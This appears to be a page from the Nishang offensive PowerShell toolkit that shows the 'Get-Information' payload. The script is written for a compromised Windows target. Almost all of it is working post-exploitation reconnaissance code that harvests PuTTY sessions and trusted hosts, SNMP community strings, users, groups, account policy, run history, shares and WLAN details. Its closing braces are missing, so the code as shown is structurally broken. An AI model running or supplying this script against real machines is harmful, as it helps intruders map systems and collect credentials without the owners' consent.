tennc 300ccb3c8d update Antak-WebShell aspx
2014-07-30 17:50:54 +08:00

62 lines
3.5 KiB

Nishang Payload which gathers juicy information from the target.
This payload extracts information form registry and some commands.
The information available would be dependent on the privilege with
which the script would be executed.
PS > Get-Information
Use above to execute the function.
function Get-Information
Param ()
function registry_values($regkey, $regvalue,$child)
if ($child -eq "no"){$key = get-item $regkey}
else{$key = get-childitem $regkey}
$key |
ForEach-Object {
$values = Get-ItemProperty $_.PSPath
ForEach ($value in $_.Property)
if ($regvalue -eq "all") {$values.$value}
elseif ($regvalue -eq "allname"){$value}
else {$values.$regvalue;break}
$output = "Logged in users:`n" + ((registry_values "hklm:\software\microsoft\windows nt\currentversion\profilelist" "profileimagepath") -join "`r`n")
$output = $output + "`n`n Powershell environment:`n" + ((registry_values "hklm:\software\microsoft\powershell" "allname") -join "`r`n")
$output = $output + "`n`n Putty trusted hosts:`n" + ((registry_values "hkcu:\software\simontatham\putty" "allname") -join "`r`n")
$output = $output + "`n`n Putty saved sessions:`n" + ((registry_values "hkcu:\software\simontatham\putty\sessions" "all") -join "`r`n")
$output = $output + "`n`n Recently used commands:`n" + ((registry_values "hkcu:\software\microsoft\windows\currentversion\explorer\runmru" "all" "no") -join "`r`n")
$output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no") -join "`r`n")
$output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no") -join "`r`n")
$output = $output + "`n`n More details for current user:`n" + ((registry_values "hkcu:\Volatile Environment" "all" "no") -join "`r`n")
$output = $output + "`n`n SNMP community strings:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
$output = $output + "`n`n SNMP community strings for current user:`n" + ((registry_values "hkcu:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
$output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
$output = $output + "`n`n Installed Applications for current user:`n" + ((registry_values "hkcu:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
$output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no") -join "`r`n")
$output = $output + "`n`n Contents of /etc/hosts:`n" + ((get-content -path "C:\windows\System32\drivers\etc\hosts") -join "`r`n")
$output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n")
$output = $output + "`n`n Account Policy:`n" + ((net accounts) -join "`r`n")
$output = $output + "`n`n Local users:`n" + ((net user) -join "`r`n")
$output = $output + "`n`n Local Groups:`n" + ((net localgroup) -join "`r`n")
$output = $output + "`n`n WLAN Info:`n" + ((netsh wlan show all) -join "`r`n")